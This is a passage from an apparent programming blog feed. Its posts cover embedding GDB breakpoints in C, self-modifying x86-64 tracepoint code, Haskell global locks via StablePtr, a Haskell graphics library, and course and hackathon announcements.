breakpoints. You can't <code>disable</code> them, count how many times they've been hit, etc.</p></li><li><p>If you run the program outside GDB, the breakpoint instruction will crash your process.</p></li></ul><p>Here is a small hack which solves both problems:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> \<br /> <span class="kw">asm</span>(<span class="st">&quot;0:&quot;</span> \<br /> <span class="st">&quot;.pushsection embed-breakpoints;&quot;</span> \<br /> <span class="st">&quot;.quad 0b;&quot;</span> \<br /> <span class="st">&quot;.popsection;&quot;</span>)</code></pre><p>We place a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local label</a> into the instruction stream, and then save its address in the <code>embed-breakpoints</code> linker section.</p><p>Then we need to convert these addresses into GDB <code>breakpoint</code> commands. I wrote a tool that does this, as a wrapper for the <code>gdb</code> command. Here's how it works, on our initial example:</p><pre><code><span class="Prompt">$</span> <span class="Entry">gcc -g -o example example.c</span><br /><br /><span class="Prompt">$</span> <span class="Entry">./gdb-with-breakpoints ./example</span><br />Reading symbols from example...done.<br />Breakpoint 1 at 0x4004f2: file example.c, line 8.<br />Breakpoint 2 at 0x4004fc: file example.c, line 10.<br /><span class="Prompt">(gdb)</span> <span class="Entry">run</span><br />Starting program: example <br />Hello,<br /><br />Breakpoint 1, main () at example.c:8<br />8 printf(&quot;world!\n&quot;);<br /><span class="Prompt">(gdb)</span> <span class="Entry">info breakpoints</span><br />Num Type Disp Enb Address What<br />1 breakpoint keep y 0x00000000004004f2 in main at example.c:8<br /> breakpoint already hit 1 time<br />2 breakpoint keep y 0x00000000004004fc in main at example.c:10<br /></code></pre><p>If we run the program normally, or in GDB without the wrapper, the <code>EMBED_BREAKPOINT</code> statements do nothing. The breakpoint addresses aren't even loaded into memory, because the <code>embed-breakpoints</code> section is not marked as <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">allocatable</a>.</p><p>You can find all of the code <a href="https://github.com/kmcallister/embedded-breakpoints">on GitHub</a> under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.</p><p>I'm not sure about the decision to write the GDB wrapper in C using <a href="http://sourceware.org/binutils/docs/bfd/">BFD</a>. I also considered Haskell and <a href="http://hackage.haskell.org/package/elf"><code>elf</code></a>, or Python and the new <a href="http://eli.thegreenplace.net/2012/01/06/pyelftools-python-library-for-parsing-elf-and-dwarf/">pyelftools</a>. One can probably do something nicer using the GDB <a href="http://sourceware.org/gdb/onlinedocs/gdb/Python.html">Python API</a>, which was added <a href="http://lwn.net/Articles/356044/">a few years ago</a>.</p><p>This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux <a href="http://www.kernel.org/doc/man-pages/online/pages/man5/proc.5.html"><code>proc</code> filesystem</a>, so that it can pass to GDB a temporary file which has already been <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/unlink.2.html">unlinked</a>. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.</p>http://mainisusuallyafunction.blogspot.com/2012/01/embedding-gdb-breakpoints-in-c-source.htmlnoreply@blogger.com (keegan)19tag:blogger.com,1999:blog-1563623855220143059.post-4245608045489331087Tue, 10 Jan 2012 06:41:00 +00002012-01-10T01:04:00.829-08:006.S184compscimitZombie 6.001 starts tomorrow!<p>The <a href="http://web.mit.edu/alexmv/6.S184/">student-run revival</a> of MIT's <a href="http://sicp.csail.mit.edu/Spring-2007/">famous intro CS class</a> starts tomorrow! 6.001 and its text <a href="http://mitpress.mit.edu/sicp/full-text/book/book.html"><em>SICP</em></a> had a singular influence on the teaching of introductions to computer science — not to be confused with intro to programming, worthwhile though that subject may be. After the unfortunate demise of 6.001 at MIT, some former TAs reanimated the class as an intense four-week experience. As <a href="http://web.mit.edu/alexmv/6.S184/">their description</a> says:</p><blockquote><p>Zombie-like, 6.001 rises from the dead to threaten students again. Unlike a zombie, though, it's moving quite a bit faster than it did the first time. Like the original, don't walk into the class expecting that it will teach you Scheme; instead, it attempts to teach thought patterns for computer science, and the structure and interpretation of computer programs. Three projects will be assigned and graded. Prereq: some programming experience; high confusion threshold.</p></blockquote><p>I'm helping teach it this year, and it should be a lot of fun. You can <a href="http://web.mit.edu/alexmv/6.S184/">follow along online</a> or if you're in the area, come to lectures Tuesdays and Thursdays, 19:00 to 21:00 in 32-044 (that's MIT building 32, room 044).</p>http://mainisusuallyafunction.blogspot.com/2012/01/zombie-6001-starts-tomorrow.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-8375049702846544984Thu, 22 Dec 2011 00:59:00 +00002011-12-21T16:59:42.185-08:00codegraphicshaskellimadethispropanePropane: Functional synthesis of images and animations in Haskell<p>I just released <a href="http://hackage.haskell.org/package/propane">Propane</a>, a Haskell libary for functional synthesis of images and animations. This is a generalization of my <a href="http://repa.ouroborus.net/">Repa</a>-based <a href="http://mainisusuallyafunction.blogspot.com/2011/10/quasicrystals-as-sums-of-waves-in-plane.html">quasicrystal code</a>.</p><p>It's based on the same ideas as <a href="http://conal.net/Pan/">Pan</a> and some other projects. An image is a function assigning a color to each point in the plane. Similarly, an animation assigns an image to each point in time. Haskell's tools for functional and declarative programming can be used directly on images and animations.</p><p>For example, you can draw a red-green gradient like so:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">Propane</span><br /><br />main <span class="fu">=</span> saveImage <span class="st">&quot;out.png&quot;</span> (<span class="dt">Size</span> <span class="dv">400</span> <span class="dv">400</span>) im <span class="kw">where</span><br /> im (x,y) <span class="fu">=</span> cRGB (unbal x) (unbal y) <span class="dv">0</span></code></pre><p>Here <code>im</code> is the image as a function, mapping an (<em>x</em>,<em>y</em>) coordinate to a color. <code>unbal</code> is a function provided by Propane, which just maps the interval [-1, 1] to [0, 1].</p><p>The source package includes an animated quasicrystal and several other <a href="https://github.com/kmcallister/propane/tree/master/examples">examples</a>. Propane uses <a href="http://repa.ouroborus.net/">Repa</a> for data-parallel array computations. That means it automatically uses multiple CPU cores for rendering, provided the program is compiled and run with threads enabled. That said, it's not yet been optimized for speed in other ways.</p><p>This is just a toy right now, but do let me know if you come up with cool enhancements or examples!</p>http://mainisusuallyafunction.blogspot.com/2011/12/propane-functional-synthesis-of-images.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-6481800066023872533Mon, 07 Nov 2011 13:39:00 +00002011-11-07T05:53:21.824-08:00ccodedonttrythisathometracepointsSelf-modifying code for debug tracing in quasi-C<p>Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. It would be convenient to declare &quot;tracepoints&quot; and enable them at runtime, like so:</p><pre class="sourceCode"><code class="sourceCode c">tracepoint foo_entry;<br /><br /><span class="dt">int</span> foo(<span class="dt">int</span> n) {<br /> TRACE(foo_entry, <span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);<br /> <span class="co">// ...</span><br />}<br /><br /><span class="co">// Called from UI, monitoring interface, etc.</span><br /><span class="dt">void</span> debug_foo() {<br /> enable(&amp;foo_entry);<br />}</code></pre><p>Here's a simple implementation of this API:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) \<br /> do { \<br /> if (_point) printf(_args); \<br /> } while (0)</span><br /><br /><span class="dt">static</span> <span class="kw">inline</span> <span class="dt">void</span> enable(tracepoint *point) {<br /> *point = <span class="dv">1</span>;<br />}</code></pre><p>Each tracepoint is simply a global variable. The construct <code>do { ... } while (0)</code> is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for <a href="http://gcc.gnu.org/onlinedocs/gcc/Variadic-Macros.html#Variadic-Macros">macros with a variable number of arguments</a>.</p><p>This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.</p><p>Our new solution will be specific to <a href="http://en.wikipedia.org/wiki/X86-64">x86-64</a> processors running Linux, though the idea can be ported to other platforms. This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as <a href="http://lwn.net/Articles/343766/">ftrace</a>, <a href="http://lwn.net/Articles/132196/">kprobes</a>, <a href="http://lwn.net/Articles/245671/">immediate values</a>, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.</p><h1 id="the-design">The design</h1><p>Our new <code>TRACE</code> macro will produce code like the following pseudo-assembly:</p><pre class="sourceCode"><code class="sourceCode nasm"><span class="fu">foo:</span><br /> ...<br /> <span class="co">; code before tracepoint</span><br /> ...<br /><span class="fu">tracepoint:</span><br /> <span class="kw">nop</span><br /><span class="fu">after_tracepoint:</span><br /> ...<br /> <span class="co">; rest of function</span><br /> ...<br /> <span class="kw">ret</span><br /><br /><span class="fu">do_tracepoint:</span><br /> <span class="kw">push</span> args to printf<br /> <span class="kw">call</span> printf<br /> <span class="kw">jmp</span> after_tracepoint</code></pre><p>In the common case, the tracepoint is disabled, and the overhead is only a single <a href="http://en.wikipedia.org/wiki/NOP"><code>nop</code></a> instruction. To enable the tracepoint, we replace the <code>nop</code> instruction in memory with <code>jmp do_tracepoint</code>.</p><h1 id="the-trace-macro">The <code>TRACE</code> macro</h1><p>Our <code>nop</code> instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard <code>jmp</code> instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte <code>nop</code>. Five one-byte <code>0x90</code> instructions would work, but a single five-byte instruction will consume fewer CPU resources. Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of <a href="http://lxr.linux.no/linux+v3.1/arch/x86/include/asm/nops.h">favorite nops</a>. We'll use this one:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define NOP5 </span><span class="ot">&quot;.byte 0x0f, 0x1f, 0x44, 0x00, 0x00;&quot;</span></code></pre><p>Let's check this instruction using <a href="http://udis86.sourceforge.net/"><code>udcli</code></a>:</p><pre><code><span class="Prompt">$</span> <span class="Entry">echo 0f 1f 44 00 00 | udcli -x -64 -att</span><br />0000000000000000 0f1f440000 nop 0x0(%rax,%rax)<br /></code></pre><p>GCC's <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-Asm">extended inline assembly</a> lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-asm-with-goto"><code>asm goto</code></a> flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the <code>asm goto</code> feature, and my macro is adapted from an example in the GCC manual.)</p><p>Here's how it looks:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) \<br /> do { \<br /> asm goto ( \<br /> &quot;0: &quot; NOP5 \<br /> &quot;.pushsection trace_table, \&quot;a\&quot;;&quot; \<br /> &quot;.quad &quot; #_point &quot;, 0b, %l0;&quot; \<br /> &quot;.popsection&quot; \<br /> : : : : __lbl_##_point); \<br /> if (0) { \<br /> __lbl_##_point: printf(_args); \<br /> } \<br /> } while (0)</span></code></pre><p>We use the <a href="http://gcc.gnu.org/onlinedocs/cpp/Stringification.html">stringify</a> and <a href="http://gcc.gnu.org/onlinedocs/cpp/Concatenation.html">concat</a> macro operators, and rely on the gluing together of adjacent string literals. A call like this:</p><pre class="sourceCode"><code class="sourceCode c">TRACE(foo_entry, <span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);</code></pre><p>will produce the following code:</p><pre class="sourceCode"><code class="sourceCode c"> <span class="kw">do</span> {<br /> <span class="kw">asm</span> <span class="kw">goto</span> (<br /> <span class="st">&quot;0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;&quot;</span><br /> <span class="st">&quot;.pushsection trace_table, </span><span class="ch">\&quot;</span><span class="st">a</span><span class="ch">\&quot;</span><span class="st">;&quot;</span><br /> <span class="st">&quot;.quad foo_entry, 0b, %l0;&quot;</span><br /> <span class="st">&quot;.popsection&quot;</span><br /> : : : : __lbl_foo_entry);<br /> <span class="kw">if</span> (<span class="dv">0</span>) {<br /> __lbl_foo_entry: printf(<span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);<br /> }<br /> } <span class="kw">while</span> (<span class="dv">0</span>);</code></pre><p>Besides emitting the <code>nop</code> instruction, we write three 64-bit values (&quot;<code>quad</code>s&quot;). They are, in order:</p><ul class="incremental"><li>The address of the <code>tracepoint</code> variable declared by the user. We never actually read or write this variable. We're just using its address as a unique key.</li><li>The address of the <code>nop</code> instruction, by way of a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local assembler label</a>.</li><li>The address of the C label for our <code>printf</code> call, as passed to <code>asm goto</code>.</li></ul><p>This is the information we need in order to patch in a <code>jmp</code> at runtime. The <a href="http://sourceware.org/binutils/docs-2.21/as/PushSection.html"><code>.pushsection</code></a> directive makes the assembler write into the <code>trace_table</code> <a href="http://sourceware.org/binutils/docs-2.21/as/Secs-Background.html">section</a> without disrupting the normal flow of code and data. The <code>&quot;a&quot;</code> <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">section flag</a> marks these bytes as &quot;allocatable&quot;, i.e. something we actually want available at runtime.</p><p>We count on GCC's optimizer to notice that the condition <code>0</code> is unlikely to be true, and therefore move the <code>if</code> body to the end of the function. It's still considered reachable due to the label passed to <code>asm goto</code>, so it will not fall victim to dead code elimination.</p><h1 id="the-linker-script">The linker script</h1><p>We have to collect all of these <code>trace_table</code> records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following <a href="http://sourceware.org/binutils/docs/ld/Scripts.html#Scripts">linker script</a>:</p><pre><code>SECTIONS {<br /> trace_table : {<br /> trace_table_start = .;<br /> *(trace_table)<br /> trace_table_end = .;<br /> }<br />}<br /></code></pre><p>This concatenates all <code>trace_table</code> sections into a single section in the resulting binary. It also provides symbols <code>trace_table_start</code> and <code>trace_table_end</code> at the endpoints of this section.</p><h1 id="memory-protection">Memory protection</h1><p>Linux systems will prevent an application from overwriting its own code, for <a href="http://www.openbsd.org/papers/ven05-deraadt/mgp00009.html">good security reasons</a>, but we can explicitly override these permissions. Memory permissions are managed per <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a> of memory. There's a <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/sysconf.3.html">correct way</a> to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define PAGE_SIZE 4096</span><br /><span class="ot">#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) &amp; ~(PAGE_SIZE-1) )</span></code></pre><p>Then we can unprotect an arbitrary region of memory by calling <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mprotect.2.html"><code>mprotect</code></a> for the appropriate page(s):</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span> unprotect(<span class="dt">void</span> *addr, size_t len) {<br /> <span class="dt">uint64_t</span> pg1 = PAGE_OF(addr),<br /> pg2 = PAGE_OF(addr + len - <span class="dv">1</span>);<br /> <span class="kw">if</span> (mprotect((<span class="dt">void</span> *) pg1, pg2 - pg1 + PAGE_SIZE,<br /> PROT_READ | PROT_EXEC | PROT_WRITE)) {<br /> perror(<span class="st">&quot;mprotect&quot;</span>);<br /> abort();<br /> }<br />}</code></pre><p>We're calling <code>mprotect</code> on a page which was not obtained from <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html"><code>mmap</code></a>. POSIX does not define this behavior, but Linux specifically allows <code>mprotect</code> on any page except the <a href="http://transnum.blogspot.com/2009/01/linuxs-vsyscall.html">vsyscall page</a>.</p><h1 id="enabling-a-tracepoint">Enabling a tracepoint</h1><p>Now we need to implement the <code>enable</code> function:</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point);</code></pre><p>We will scan through the <code>trace_table</code> records looking for a matching <code>tracepoint</code> pointer. The C struct corresponding to a <code>trace_table</code> record is:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">struct</span> trace_desc {<br /> tracepoint *point;<br /> <span class="dt">void</span> *jump_from;<br /> <span class="dt">void</span> *jump_to;<br />} __attribute__((packed));</code></pre><p>The <code>packed</code> attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. Now we can implement a linear search through this table.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point) {<br /> <span class="kw">extern</span> <span class="kw">struct</span> trace_desc trace_table_start[], trace_table_end[];<br /> <span class="kw">struct</span> trace_desc *desc;<br /> <span class="kw">for</span> (desc = trace_table_start; desc &lt; trace_table_end; desc++) {<br /> <span class="kw">if</span> (desc-&gt;point != point)<br /> <span class="kw">continue</span>;<br /><br /> <span class="dt">int64_t</span> offset = (desc-&gt;jump_to - desc-&gt;jump_from) - <span class="dv">5</span>;<br /> <span class="kw">if</span> ((offset &gt; INT32_MAX) || (offset &lt; INT32_MIN)) {<br /> fprintf(stderr, <span class="st">&quot;offset too big: %lx</span><span class="ch">\n</span><span class="st">&quot;</span>, offset);<br /> abort();<br /> }<br /><br /> <span class="dt">int32_t</span> offset32 = offset;<br /> <span class="dt">unsigned</span> <span class="dt">char</span> *dest = desc-&gt;jump_from;<br /> unprotect(dest, <span class="dv">5</span>);<br /> dest[<span class="dv">0</span>] = <span class="bn">0xe9</span>;<br /> memcpy(dest<span class="dv">+1</span>, &amp;offset32, <span class="dv">4</span>);<br /> }<br />}</code></pre><p>We enable a tracepoint by overwriting its <code>nop</code> with an unconditional jump. The opcode is <code>0xe9</code>. The operand is a 32-bit displacement, interpreted relative to the instruction <em>after</em> the jump. <code>desc-&gt;jump_from</code> points to the beginning of what will be the jump instruction, so we subtract 5 from the displacement. Then we unprotect memory and write the new bytes into place.</p><p>That's everything. You can grab all of this code from <a href="https://github.com/kmcallister/tracepoints">GitHub</a>, including a simple test program.</p><h1 id="pitfalls">Pitfalls</h1><p>Where to start?</p><p>This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an <a href="http://lxr.linux.no/linux+v3.1/arch/arm/include/asm/cacheflush.h#L176">instruction cache flush</a> after writing to code. Linux on ARM <a href="http://lxr.linux.no/linux+v3.1/arch/arm/kernel/traps.c#L502">implements</a> the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/cacheflush.2.html"><code>cacheflush</code> system call</a> for this purpose.</p><p>Our code is not thread-safe, either. If one thread reaches a <code>nop</code> while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The <a href="http://www.ksplice.com/doc/ksplice.pdf">Ksplice paper</a> [PDF] discusses how to prevent this, in the context of <a href="http://www.ksplice.com/">live-patching the Linux kernel</a>.</p><p>Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.</p><p>The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that <em>someone</em> will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.</p>http://mainisusuallyafunction.blogspot.com/2011/11/self-modifying-code-for-debug-tracing.htmlnoreply@blogger.com (keegan)8tag:blogger.com,1999:blog-1563623855220143059.post-7529328850122408321Fri, 04 Nov 2011 11:22:00 +00002011-11-04T05:00:18.554-07:00ccodeglobal-lockhaskellGlobal locking through StablePtr<p>I spoke before of using <a href="http://mainisusuallyafunction.blogspot.com/2011/10/safe-top-level-mutable-variables-for.html">global locks in Haskell</a> to protect a thread-unsafe C library. And I wrote about a <a href="http://mainisusuallyafunction.blogspot.com/2011/10/thunks-and-lazy-blackholes-introduction.html">GHC bug</a> which breaks the most straightforward way to get a global lock.</p><p>My new solution is to store an <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/base-4.3.1.0/Control-Concurrent-MVar.html"><code>MVar</code></a> lock in a C global variable via <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a>. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.</p><p>You can get the library from <a href="http://hackage.haskell.org/package/global-lock">Hackage</a> or browse <a href="https://github.com/kmcallister/global-lock">the source</a>, including a <a href="https://github.com/kmcallister/global-lock/blob/master/test/counter.hs">test program</a>. You can also use this code as a template for including a similar lock in your own Haskell project.</p><h1 id="the-c-code">The C code</h1><p>On <a href="https://github.com/kmcallister/global-lock/blob/master/cbits/global.c">the C side</a>, we declare a global variable and a function to read that variable.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span>* global = <span class="dv">0</span>;<br /><br /><span class="dt">void</span>* hs_globalzmlock_get_global(<span class="dt">void</span>) {<br /> <span class="kw">return</span> global;<br />}</code></pre><p>To avoid name clashes, I gave this function a long name based on the <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Compiler/SymbolNames">z-encoding</a> of my package's name. The variable named <code>global</code> will not conflict with another compilation unit, because it's declared <code>static</code>.</p><p>Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC <a href="http://gcc.gnu.org/onlinedocs/gcc/Atomic-Builtins.html">built-in for atomic memory access</a>.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">int</span> hs_globalzmlock_set_global(<span class="dt">void</span>* new_global) {<br /> <span class="dt">void</span>* old = __sync_val_compare_and_swap(&amp;global, <span class="dv">0</span>, new_global);<br /> <span class="kw">return</span> (old == <span class="dv">0</span>);<br />}</code></pre><p>If <code>old</code> is not 0, then someone has already set <code>global</code>, and our assignment was dropped. We report this condition to the caller.</p><h1 id="foreign-imports">Foreign imports</h1><p>On <a href="https://github.com/kmcallister/global-lock/blob/master/System/GlobalLock/Internal.hs">the Haskell side</a>, we import these C functions.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">foreign import ccall unsafe</span> <span class="st">&quot;hs_globalzmlock_get_global&quot;</span><br /><span class="ot"> c_get_global </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Ptr</span> ())<br /><br /><span class="kw">foreign import ccall</span> <span class="st">&quot;hs_globalzmlock_set_global&quot;</span><br /><span class="ot"> c_set_global </span><span class="ot">::</span> <span class="dt">Ptr</span> () <span class="ot">-&gt;</span> <span class="dt">IO</span> <span class="dt">CInt</span></code></pre><p>The <code>unsafe</code> import of <code>c_get_global</code> demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might <a href="http://blog.ezyang.com/2010/07/safety-first-ffi-and-threading/">block unrelated Haskell code</a>. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.</p><p>In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import <code>unsafe</code> tells GHC to ignore the blocking concern, and generate a direct C function call.</p><p>Our function <code>c_get_global</code> is a good use case for <code>unsafe</code>, because it simply returns a global variable. In my <a href="https://github.com/kmcallister/global-lock/blob/master/test/bench.hs">tests</a>, adding <code>unsafe</code> decreased the overall latency of locking by about 50%. We cannot use <code>unsafe</code> with <code>c_set_global</code> because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because <code>c_set_global</code> will only be called a few times anyway.</p><h1 id="the-haskell-code">The Haskell code</h1><p>Now we have access to a C global of type <code>void*</code>, and we want to store a Haskell value of type <code>MVar ()</code>. The <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a> module is just what we need. A <code>StablePtr</code> is a reference to some Haskell expression, which can be converted to <code>Ptr ()</code>, aka <code>void*</code>. There is no guarantee about this <code>Ptr ()</code> value, except that it can be converted back to the original <code>StablePtr</code>.</p><p>Here's how we store an <code>MVar</code>:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">set </span><span class="ot">::</span> <span class="dt">IO</span> ()<br />set <span class="fu">=</span> <span class="kw">do</span><br /> mv <span class="ot">&lt;-</span> newMVar ()<br /> ptr <span class="ot">&lt;-</span> newStablePtr mv<br /> ret <span class="ot">&lt;-</span> c_set_global (castStablePtrToPtr ptr)<br /> when (ret <span class="fu">==</span> <span class="dv">0</span>) <span class="fu">$</span><br /> freeStablePtr ptr</code></pre><p>It's fine for two threads to enter <code>set</code> concurrently. In one thread, the assignment will be dropped, and <code>c_set_global</code> will return 0. In that case we free the unused <code>StablePtr</code>, and the <code>MVar</code> will eventually be garbage-collected. <code>StablePtr</code>s must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding <code>void*</code>.</p><p>Now we can retrieve the <code>MVar</code>, or create it if necessary.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">MVar</span> ())<br />get <span class="fu">=</span> <span class="kw">do</span><br /> p <span class="ot">&lt;-</span> c_get_global<br /> <span class="kw">if</span> p <span class="fu">==</span> nullPtr<br /> <span class="kw">then</span> set <span class="fu">&gt;&gt;</span> get<br /> <span class="kw">else</span> deRefStablePtr (castPtrToStablePtr p)</code></pre><p>In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain <code>NULL</code> do we allocate an <code>MVar</code>, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.</p><p>All that's left is the user-visible locking interface:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">lock </span><span class="ot">::</span> <span class="dt">IO</span> a <span class="ot">-&gt;</span> <span class="dt">IO</span> a<br />lock act <span class="fu">=</span> get <span class="fu">&gt;&gt;=</span> <span class="fu">flip</span> withMVar (<span class="fu">const</span> act)</code><br /><br /></pre><h1 id="inspecting-the-machine-code">Inspecting the machine code</h1><p>Just for fun, let's see how GCC implements <code>__sync_val_compare_and_swap</code> on the AMD64 architecture.</p><pre><code><span class="Prompt">$</span> <span class="Entry">objdump -d dist/build/cbits/global.o</span><br />...<br />0000000000000010 &lt;hs_globalzmlock_set_global&gt;:<br /> 10: 31 c0 xor %eax,%eax<br /> 12: f0 48 0f b1 3d 00 00 lock cmpxchg %rdi,0x0(%rip)<br /> 19: 00 00<br />....<br /></code></pre><p>This <code>lock cmpxchg</code> is the same instruction used by the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L165">GHC runtime system</a> for its own atomic compare-and-swap. The offset on the operand <code>0x0(%rip)</code> will be <a href="http://www.iecc.com/linker/linker07.html">relocated</a> to point at <code>global</code>.</p>http://mainisusuallyafunction.blogspot.com/2011/11/global-locking-through-stableptr.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-3577785425903756888Thu, 03 Nov 2011 10:47:00 +00002011-11-03T03:47:09.281-07:00bostonhackathonhaskellHaskell hackathon in the Boston area, January 20 to 22<p>The global sensation that is the <a href="http://haskell.org/haskellwiki/Hackathon">Haskell Hackathon</a> is coming to the Boston area. <a href="http://haskell.org/haskellwiki/Hac_Boston">Hac Boston</a> will be held <strong>January 20 to 22, 2012</strong> in <strong>Cambridge, Massachusetts</strong>. It's open to all; you do not need to be a Haskell guru to attend. All you need is a basic knowledge of Haskell, a willingness to learn, and a <a href="http://haskell.org/haskellwiki/Hac_Boston/Projects">project</a> you're excited to help with (or a project of your own to work on).</p><p>Spaces are filling up, so be sure to <a href="http://haskell.org/haskellwiki/Hac_Boston/Register">register</a> if you plan on coming. You can also coordinate <a href="http://haskell.org/haskellwiki/Hac_Boston/Projects">projects</a> on the HaskellWiki.</p><p><a href="http://mit.edu/">MIT</a> is providing space (exact room to be determined) and <a href="https://www.capitaliq.com/">Capital IQ</a> is sponsoring the event. In addition to coding, there will be food and some short talks. I'm interested in giving a ~20 minute talk of some kind, with slides also available online. What would people like to hear about?</p>http://mainisusuallyafunction.blogspot.com/2011/11/haskell-hackathon-in-boston-area.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-7170898440757064828Mon, 31 Oct 2011 07:17:00 +00002011-10-31T00:17:50.974-07:00cghchaskellrtsThunks and lazy blackholes: an introduction to GHC at runtime<p>This article is about a <a href="http://haskell.org/ghc/">GHC</a> bug I encountered recently, but it's really an excuse to talk about some GHC internals at an intro level. (In turn, an excuse for me to learn about those internals.)</p><p>I'll assume you're familiar with the basics of Haskell and lazy evaluation.</p><h1 id="the-bug">The bug</h1><p>I spoke <a href="http://mainisusuallyafunction.blogspot.com/2011/10/safe-top-level-mutable-variables-for.html">before</a> of using global locks in Haskell to protect a thread-unsafe C library. Unfortunately a <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">GHC bug</a> prevents this from working. Using <code>unsafePerformIO</code> at the top level of a file can result in IO that happens more than once.</p><p>Here is a simple program which illustrates the problem:</p><pre class="sourceCode"><code 